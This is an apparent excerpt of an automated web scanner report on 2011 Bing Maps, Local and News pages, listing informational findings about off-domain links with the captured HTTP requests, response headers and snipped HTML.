http://sc1.maps.live.com/localsearch/css/en-us/kiev.css?cb=20110113.409
http://www.redacted/
https://feedback.live.com/default.aspx?productkey=wlsearchlocal&locale=en-us&P1=footerlivelocal&P2=&P3=&P4=LLSV&P5=&P6=&P7=Original&P8=&P9=&P10=&P11=&P13=&searchtype=LiveLocalSearch&backurl=http%3a%2f%2fwww.bing.com%3a80%2flocalsearch%2fypdefault.aspx%3fcobrand%3d1

Request

GET /local/ypdefault.aspx?cobrand=1 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 58592
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 19:09:19 GMT
Last-Modified: Sun, 30 Jan 2011 17:09:19 GMT
X-BM-TraceID: 61c0a5daf9364d5eae29d87a4b59df08
X-AspNet-Version: 2.0.50727
X-BM-Srv: EWRM001611
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:09:19 GMT
Connection: close
Set-Cookie: BID=9a3c455b03a34c399ff347ddebe9c0da; path=/local
Set-Cookie: CID=2ce82b4bde284df69608cff257d735cf; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/local
Set-Cookie: CDate=1/30/2011 5:09:19 PM; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/local
Set-Cookie: _SS=SID=977701F1155A45C48694B30BF27CA1EE; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:19 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ca384c53d8d3044e9a9f505bd01d98b5d; expires=Tue, 29-Jan-2013 17:09:19 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:19 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.live
...[SNIP]...
<link id="canonicalUrl" rel="canonical" href="http://www.bing.com/local/ypdefault.aspx?catid=10000" />
<link rel = "stylesheet" type = "text/css" href = "http://sc1.maps.live.com/localsearch/css/en-us/kiev.css?cb=20110113.409" />

<style type="text/css">
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&ID=FD,65.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,67.1')">Hotmail</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,79.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,81.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&ID=FD,83.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,85.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,87.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808582.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&ID=FD,89.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?productkey=wlsearchlocal&locale=en-us&P1=footerlivelocal&P2=&P3=&P4=LLSV&P5=&P6=&P7=Original&P8=&P9=&P10=&P11=&P13=&searchtype=LiveLocalSearch&backurl=http%3a%2f%2fwww.bing.com%3a80%2flocalsearch%2fypdefault.aspx%3fcobrand%3d1" id="sb_feedback" onmousedown="return si_T('&ID=FD,91.1')">Tell us what you think</a>
...[SNIP]...

22.383. http://www.bing.com/maps/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/maps/

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/maps/?q=

The response contains the following links to other domains:

http://advertising.microsoft.com/advertise-on-bing
http://g.live.com/9uxp9en-us/ftr1
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://mail.live.com/
http://www.redacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296407177&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwww.bing.com%2FPassport.aspx%3Frequrl%3Dhttp%253a%252f%252fwww.bing.com%253a80%252fmaps%252f%253fq%253d&lc=1033&id=264960

Request

GET /maps/?q= HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 24bb939fac60446db081924e1bf5bbc9
X-Ve-Server: EWR-01606-20110113.409-0
X-UA-Compatible: IE=7
X-AspNet-Version: 2.0.50727
X-BM-Srv: EWRM001606
Date: Sun, 30 Jan 2011 17:06:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _SS=SID=F8325A831307499DABEC75E3079FEA02; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:06:17 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2cb22853f0a0c2423d98b0be5f0da6250a; expires=Tue, 29-Jan-2013 17:06:17 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621026&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:06:17 GMT; domain=.bing.com; path=/
Content-Length: 117376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:v
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&ID=FD,36.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,38.1')">Hotmail</a>
...[SNIP]...
</a><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296407177&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwww.bing.com%2FPassport.aspx%3Frequrl%3Dhttp%253a%252f%252fwww.bing.com%253a80%252fmaps%252f%253fq%253d&lc=1033&id=264960" onclick="if(VEShell.Passport.FrontDoorLinkHandler)return(VEShell.Passport.FrontDoorLinkHandler(arguments[0]));return true;" onmousedown="return si_T('&ID=FD,9.1')">Sign in</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,49.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,51.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&ID=FD,53.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,55.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,57.1')">About our ads</a>
...[SNIP]...

22.384. http://www.bing.com/maps/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/maps/default.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/maps/default.aspx?FORM=MSNNAV

The response contains the following links to other domains:

http://advertising.microsoft.com/advertise-on-bing
http://g.live.com/9uxp9en-us/ftr1
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://mail.live.com/
http://www.redacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296407222&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwww.bing.com%2FPassport.aspx%3Frequrl%3Dhttp%253a%252f%252fwww.bing.com%253a80%252fmaps%252fdefault.aspx%253fFORM%253dMSNNAV&lc=1033&id=264960

Request

GET /maps/default.aspx?FORM=MSNNAV HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 196836b1dbd7411b8a6488298a68d1f6
X-Ve-Server: EWR-01609-20110113.409-0
X-UA-Compatible: IE=7
X-AspNet-Version: 2.0.50727
X-BM-Srv: EWRM001609
Date: Sun, 30 Jan 2011 17:07:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _SS=SID=EA44C2EB561E4EFDAA629E61353FEC6D; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:07:02 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2cb612a811dc1349a5bd4844fe05a12b08; expires=Tue, 29-Jan-2013 17:07:02 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621027&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:07:02 GMT; domain=.bing.com; path=/
Content-Length: 117533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:v
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&ID=FD,36.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,38.1')">Hotmail</a>
...[SNIP]...
</a><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296407222&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwww.bing.com%2FPassport.aspx%3Frequrl%3Dhttp%253a%252f%252fwww.bing.com%253a80%252fmaps%252fdefault.aspx%253fFORM%253dMSNNAV&lc=1033&id=264960" onclick="if(VEShell.Passport.FrontDoorLinkHandler)return(VEShell.Passport.FrontDoorLinkHandler(arguments[0]));return true;" onmousedown="return si_T('&ID=FD,9.1')">Sign in</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,49.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,51.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&ID=FD,53.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,55.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,57.1')">About our ads</a>
...[SNIP]...

22.385. http://www.bing.com/maps/explore/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/maps/explore/

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/maps/explore/?org=aj&FORM=Z9LH9

The response contains the following links to other domains:

http://mail.live.com/
http://www.redacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296407232&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwww.bing.com%2FPassport.aspx%3Frequrl%3Dhttp%253a%252f%252fwww.bing.com%253a80%252fmaps%252fexplore%252f%253forg%253daj%2526FORM%253dZ9LH9&lc=1033&id=264960

Request

GET /maps/explore/?org=aj&FORM=Z9LH9 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 43758
Content-Type: text/html; charset=utf-8
X-Ve-Server: 01611
X-AspNet-Version: 2.0.50727
X-BM-Srv: EWRM001611
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:07:12 GMT
Connection: close
Set-Cookie: slpreview=1; path=/maps
Set-Cookie: _SS=SID=0B356F144E32438C91C61B8332E2BD10; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:07:12 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c98b20ec4fc584412a25a5a2271c0db7e; expires=Tue, 29-Jan-2013 17:07:12 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621027&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:07:12 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta content="text/
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&ID=FD,36.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,38.1')">Hotmail</a>
...[SNIP]...
</a><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296407232&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwww.bing.com%2FPassport.aspx%3Frequrl%3Dhttp%253a%252f%252fwww.bing.com%253a80%252fmaps%252fexplore%252f%253forg%253daj%2526FORM%253dZ9LH9&lc=1033&id=264960" onclick="if(FrontDoorLinkHandler)return(FrontDoorLinkHandler(arguments[0]));return true;" onmousedown="return si_T('&ID=FD,9.1')">Sign in</a>
...[SNIP]...

22.386. http://www.bing.com/news/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/news/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/news/search?q=ozzy+osbourne+justin+bieber&form=msnhpm

The response contains the following links to other domains:

http://advertising.microsoft.com/advertise-on-bing
http://blog.syracuse.com/entertainment/2011/01/2011_superbowl_commercial_cele.html
http://g.live.com/9uxp9en-us/ftr1
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://mail.live.com/
http://onlinehelp.microsoft.com/en-US/bing/ff808523.aspx
http://sports.espn.go.com/espn/page2/story?id=6073772
http://voices.washingtonpost.com/celebritology/2011/01/justin_bieber_and_ozzy_osbourn.html?wprss=celebritology
http://www.associatedcontent.com/content_recommend.shtml?recommend=true&content_type=article&content_type_id=7693654
http://www.azcentral.com/ent/celeb/articles/2011/01/28/20110128justin-bieber-ozzy-team-up-best-buy-super-bowl-ad.html
http://www.carrollcountytimes.com/news/local/performers-with-carroll-county-roots-rack-up-hits-on-youtube/article_52283146-2bfb-11e0-963d-001cc4c002e0.html?photo=1
http://www.dbtechno.com/entertainment/2011/01/30/ozzy-osbourne-and-justin-bieber-to-do-superbowl-commercial/
http://www.redacted/
http://www.mtv.com/news/articles/1656785/justin-bieber-ozzy-osbourne-super-bowl.jhtml
http://www.nationalledger.com/lifestyle/article_272637545.shtml
http://www.nydailynews.com/entertainment/2011/01/28/2011-01-28_bieber_ozzy_osbourne_team_up_for_super_bowl_ad.html
http://www.okmagazine.com/2011/01/justin-bieber-changes-his-hair-looks-like-robert-pattinson/
http://www.pbpulse.com/gossip/celeb-stalker/2011/01/29/justin-bieber-ozzy-osbourne-in-super-bowl-ad/
http://www.people.com/people/article/0,,20461627,00.html?xid=rss-topheadlines
http://www.popeater.com/2011/01/28/justin-bieber-ozzy-osbourne-ad/
http://www.thestreet.com/story/10986263/1/justin-bieber-channels-his-inner-tech-geek-on-set-for-best-buys-inaugural-big-game-commercial-courtesy-of-christopher-polk-getty-images.html
http://www.twincities.com/entertainment/ci_17229903
http://www.usmagazine.com/moviestvmusic/news/justin-bieber-and-ozzy-osbourne-join-forces-for-fun-super-bowl-ad-2011281
https://feedback.live.com/default.aspx?locale=en-US&productkey=wlsearchnews&P1=dsatnews&P2=ozzy+osbourne+justin+bieber&P3=0&P4=msnhpm&P5=F741A5D3C8544F77A0B57D8439E7E06E&P6=Dallas%2c+Texas&P7=Original&P8=&P9=32.8%2f-96.787&P10=24902&P11=&P12=&searchtype=News+Search&optl1=1&backurl=http%3a%2f%2fwww.bing.com%3a80%2fnews%2fsearch%3fq%3dozzy%2bosbourne%2bjustin%2bbieber%26FORM%3dFEEDTU
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296407052&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwww.bing.com%2FPassport.aspx%3Frequrl%3Dhttp%253a%252f%252fwww.bing.com%253a80%252fnews%252fsearch%253fq%253dozzy%252bosbourne%252bjustin%252bbieber%2526form%253dmsnhpm%2526alert_showform%253d1&lc=1033&id=264960

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61044
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:04:12 GMT
Connection: close
Set-Cookie: _SS=SID=B97A28CBF38B449B9527EDAAE03B878F; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:04:11 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c635024954b6e4cedb19420ef37d99b0d; expires=Tue, 29-Jan-2013 17:04:11 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621024&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:04:11 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&ID=FD,212.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,214.1')">Hotmail</a>
...[SNIP]...
<p class="SignInLink">To sign up for news alerts, you need to <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296407052&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwww.bing.com%2FPassport.aspx%3Frequrl%3Dhttp%253a%252f%252fwww.bing.com%253a80%252fnews%252fsearch%253fq%253dozzy%252bosbourne%252bjustin%252bbieber%2526form%253dmsnhpm%2526alert_showform%253d1&lc=1033&id=264960" onmousedown="return si_T('&ID=news,721.1')">sign in</a>
...[SNIP]...
<p class="SignUpLink">Don't have a Windows Live ID? <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296407052&rver=6.0.5286.0&wp=MBI&wreply=http:%2F%2Fwww.bing.com%2FPassport.aspx%3Frequrl%3Dhttp%253a%252f%252fwww.bing.com%253a80%252fnews%252fsearch%253fq%253dozzy%252bosbourne%252bjustin%252bbieber%2526form%253dmsnhpm%2526alert_showform%253d1&lc=1033&id=264960" onmousedown="return si_T('&ID=news,721.2')">Sign up</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=news,418.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=news,420.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&ID=news,422.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=news,424.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=news,426.1')">About our ads</a>
...[SNIP]...
<div class="sn_img"><a href="http://www.okmagazine.com/2011/01/justin-bieber-changes-his-hair-looks-like-robert-pattinson/" onmousedown="return si_T('&ID=news,59.1')" ><img width="80" height="80" src="/imagenewsfetcher.aspx?q=http%3a%2f%2fcdn02.okcdn.okmagazine.com%2fwp-content%2fuploads%2f2011%2f01%2fJustin_Bieber_Jan28newsnea1.jpg&id=12D00762BC2D388FC2CCEA27C7C
...[SNIP]...
<div class="sn_hd"><a href="http://www.dbtechno.com/entertainment/2011/01/30/ozzy-osbourne-and-justin-bieber-to-do-superbowl-commercial/" onmousedown="return si_T('&ID=news,52.1')" ><strong>
...[SNIP]...
<div class="sn_hd"><a href="http://www.people.com/people/article/0,,20461627,00.html?xid=rss-topheadlines" onmousedown="return si_T('&ID=news,54.1')" ><strong>
...[SNIP]...
<div class="sn_hd"><a href="http://www.mtv.com/news/articles/1656785/justin-bieber-ozzy-osbourne-super-bowl.jhtml" onmousedown="return si_T('&ID=news,56.1')" ><strong>
...[SNIP]...
<div class="sn_img"><a href="http://www.nationalledger.com/lifestyle/article_272637545.shtml" onmousedown="return si_T('&ID=news,73.1')" ><img width="80" height="80" src="/imagenewsfetcher.aspx?q=http%3a%2f%2fwww.nationalledger.com%2fartman%2fuploads%2fjustin-bb.jpg&id=20B6BA9F07805D1AA5EF36F4E3BD2F4C" title="Super Bowl Ads 2011: Ozz
...[SNIP]...
<div class="sn_hd"><a href="http://www.usmagazine.com/moviestvmusic/news/justin-bieber-and-ozzy-osbourne-join-forces-for-fun-super-bowl-ad-2011281" onmousedown="return si_T('&ID=news,66.1')" ><strong>
...[SNIP]...
<div class="sn_hd"><a href="http://www.azcentral.com/ent/celeb/articles/2011/01/28/20110128justin-bieber-ozzy-team-up-best-buy-super-bowl-ad.html" onmousedown="return si_T('&ID=news,68.1')" ><strong>
...[SNIP]...
<div class="sn_hd"><a href="http://www.thestreet.com/story/10986263/1/justin-bieber-channels-his-inner-tech-geek-on-set-for-best-buys-inaugural-big-game-commercial-courtesy-of-christopher-polk-getty-images.html" onmousedown="return si_T('&ID=news,70.1')" ><strong>
...[SNIP]...
<div class="sn_hd"><a href="http://www.associatedcontent.com/content_recommend.shtml?recommend=true&content_type=article&content_type_id=7693654" onmousedown="return si_T('&ID=news,80.1')" ><strong>
...[SNIP]...
<div class="sn_img"><a href="http://www.nydailynews.com/entertainment/2011/01/28/2011-01-28_bieber_ozzy_osbourne_team_up_for_super_bowl_ad.html" onmousedown="return si_T('&ID=news,85.1')" ><img width="80" height="80" src="/imagenewsfetcher.aspx?q=http%3a%2f%2fassets.nydailynews.com%2fimg%2f2011%2f01%2f29%2falg_osbourne_bieber.jpg&id=0B80E103D78E7BF5BA9E5C81769039F9" title="Justin Bie
...[SNIP]...
<div class="sn_hd"><a href="http://www.nydailynews.com/entertainment/2011/01/28/2011-01-28_bieber_ozzy_osbourne_team_up_for_super_bowl_ad.html" onmousedown="return si_T('&ID=news,84.1')" ><strong>
...[SNIP]...
<div class="sn_img"><a href="http://www.popeater.com/2011/01/28/justin-bieber-ozzy-osbourne-ad/" onmousedown="return si_T('&ID=news,90.1')" ><img width="80" height="80" src="/imagenewsfetcher.aspx?q=http%3a%2f%2fwww.blogcdn.com%2fwww.popeater.com%2fmedia%2f2011%2f01%2f1296231154593.jpg&id=7C67EE3CA7C2AC57A3F38656C861866F" title="Justin
...[SNIP]...
<div class="sn_hd"><a href="http://www.popeater.com/2011/01/28/justin-bieber-ozzy-osbourne-ad/" onmousedown="return si_T('&ID=news,89.1')" ><strong>
...[SNIP]...
<div class="sn_img"><a href="http://blog.syracuse.com/entertainment/2011/01/2011_superbowl_commercial_cele.html" onmousedown="return si_T('&ID=news,95.1')" ><img width="80" height="80" src="/imagenewsfetcher.aspx?q=http%3a%2f%2fmedia.syracuse.com%2fentertainment%2fphoto%2f9229989-large.jpg&id=445C6430C19C344A77EC266588F88CB6" title="Super Bowl commerci
...[SNIP]...
<div class="sn_hd"><a href="http://blog.syracuse.com/entertainment/2011/01/2011_superbowl_commercial_cele.html" onmousedown="return si_T('&ID=news,94.1')" >Super Bowl commercial celebs: <strong>
...[SNIP]...
<div class="sn_img"><a href="http://voices.washingtonpost.com/celebritology/2011/01/justin_bieber_and_ozzy_osbourn.html?wprss=celebritology" onmousedown="return si_T('&ID=news,100.1')" ><img width="80" height="80" src="/imagenewsfetcher.aspx?q=http%3a%2f%2fblog.washingtonpost.com%2fclicktrack%2fbieber.JPG&id=DEC74DE740F3B3C7EBA65FACBB8C40B7" title="Justin Bieber and Ozzy Osbourne
...[SNIP]...
<div class="sn_hd"><a href="http://voices.washingtonpost.com/celebritology/2011/01/justin_bieber_and_ozzy_osbourn.html?wprss=celebritology" onmousedown="return si_T('&ID=news,99.1')" ><strong>
...[SNIP]...
<div class="sn_hd"><a href="http://sports.espn.go.com/espn/page2/story?id=6073772" onmousedown="return si_T('&ID=news,3.1')" >Tuesday is 'Nipplegate' anniversary</a>
...[SNIP]...
<div class="sn_hd"><a href="http://www.dbtechno.com/entertainment/2011/01/30/ozzy-osbourne-and-justin-bieber-to-do-superbowl-commercial/" onmousedown="return si_T('&ID=news,8.1')" ><strong>
...[SNIP]...
<div class="sn_hd"><a href="http://www.carrollcountytimes.com/news/local/performers-with-carroll-county-roots-rack-up-hits-on-youtube/article_52283146-2bfb-11e0-963d-001cc4c002e0.html?photo=1" onmousedown="return si_T('&ID=news,12.1')" >Performers with Carroll County roots rack up hits on YouTube</a>
...[SNIP]...
<div class="sn_hd"><a href="http://www.pbpulse.com/gossip/celeb-stalker/2011/01/29/justin-bieber-ozzy-osbourne-in-super-bowl-ad/" onmousedown="return si_T('&ID=news,17.1')" ><strong>
...[SNIP]...
<div class="sn_hd"><a href="http://www.twincities.com/entertainment/ci_17229903" onmousedown="return si_T('&ID=news,22.1')" >Odd couple at the Super Bowl</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,226.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,228.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&ID=FD,230.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,232.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,234.1')">About our ads</a>
...[SNIP]...
